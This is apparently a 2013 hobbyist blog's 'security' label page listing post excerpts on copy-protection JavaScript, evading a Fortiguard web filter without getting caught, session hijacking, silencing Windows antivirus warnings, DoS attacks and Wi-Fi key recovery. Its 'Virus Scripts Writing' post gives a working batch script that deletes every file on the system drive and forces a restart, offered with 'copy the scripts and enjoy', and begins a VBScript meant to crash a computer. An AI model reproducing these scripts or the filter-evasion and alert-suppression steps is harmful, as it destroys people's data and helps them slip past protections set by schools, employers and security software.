Showing posts with label security. Show all posts
Showing posts with label security. Show all posts

Saturday, 7 September 2013

How to Protect your Content from Content Thieves

As we all know that number of bloggers are increasing day by day and so is the number of Content thieves, they tend to copy our original contents while publishing on their blog and websites. Sometime these copycats rank better then the original blog publisher. They easily get high ranks without spending hours of hard work in writing posts, articles. It is indeed unbearable for the blog owner who has spend his previous time in preparing fresh and unique contents and someone easily copy the entire post and publish any where on the web. To make this more sophisticated for copycats who try to copy our post, we must add JavaScript codes which will totally disable copying of text from your blog or website. Or we can copyright website content, but it won't prevent the content from being copied.

Why Disable Copying of Text in Blog?

There are many "plagiarism" issues, we must take care of our contents and keep eyes on our duplicates contents 24/7 hours. Content copying is one of the biggest problem for Google adsense Publishers. Because Google disables your Adsense Account if they find your articles too many time on different web addresses. The latest Google Panda updates also have strict rules against the copying of copyrighted content, we must take care of our content and check out thrice a day who is copying our posts and articles. So i'll be providing you JavaScript/HTML codes that will  disable right click on blogger So that no one cay easily grab and copy text from your blogs or websites.

JavaScript/HTML codes for Blogger

Follow the steps mentioned to completely disable right click on your blogger blog. Following are the steps to add this code in blogger blog :
How to Disable Copying of Text on Blog



  • Go to Blogger Dashboard:
  • Go to layout >> Add Widget >> Html/Javascipt gadget:
  • Now paste the code given below:









<script type="text/javascript"> var omitformtags=["input", "textarea", "select"] omitformtags=omitformtags.join("|") function disableselect(e){ if (omitformtags.indexOf(e.target.tagName.toLowerCase())==-1) return false } function reEnable(){ return true } if (typeof document.onselectstart!="undefined") document.onselectstart=new Function ("return false") else{ document.onmousedown=disableselect document.onmouseup=reEnable } </script>

After you've paste the given code >> click on save and your text is now safe from Copycats...

Enjoy!!!!!!
 
Read More

Monday, 26 August 2013

Break Fortiguard web filter

Break Fortiguard web filter

Let's know how to crack fortiguard web filter in 3 easy steps. All 3 are very effective and you can use them at schools, universities and offices. But Keep always one thing in mind don't get caught. If caught you might get severe punishment for breaking the laws. Here they are..
Read More

Sunday, 25 August 2013

Session Hijacking in Public Networks

What is Session Hijacking?

Every time you connected to the web application (usually a dynamic web application) you will have a unique ID called "session", this session will identifies you as a valid user and will always valid until you kill the session (log out process) or the session has expired. Some bad people trying to identifies or guessing the session ID value to gain privileges as a valid user in a web application.
Read More

Wednesday, 21 August 2013

Disable Security Center Warning

Follow the given steps to edit the computer registry for disable message:
First click on Start button then type Regedit in Run option.
Here locate the location to:
>>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center

In right side panel, double click on Anti Virus Disable Notify and set its value 1.
Now close the registry editor and restart your computer after any changes to go into effect.

Enjoy!!!
Read More

Sunday, 18 August 2013

DOS Attacks

Denial of service (DOS) attack, a type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. Many DoS attacks, such as the Ping of Death and Teardrop attacks, exploit limitations in the TCP/IP protocols.

Types:
Teardrop attack is type of attack where fragmented packets are forged to overlap each other when the receiving host tries to reassemble them.

Read More

Virus Scripts Writing

I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept .
Open Notepad.....
copy the scripts and enjoy!!! 


>>This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00


Save The Above Code a .bat file



>> This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Read More

Wi-Fi Key Recovery in Android Phones


 >>You need root to use this application.
(Rooting may harm your phone..neither me nor the developer is responsible for any damage caused to your phone)
 >>You need to have connected to the network in the past.
 >> This app cannot "hack" into an unknown/new network.

Read More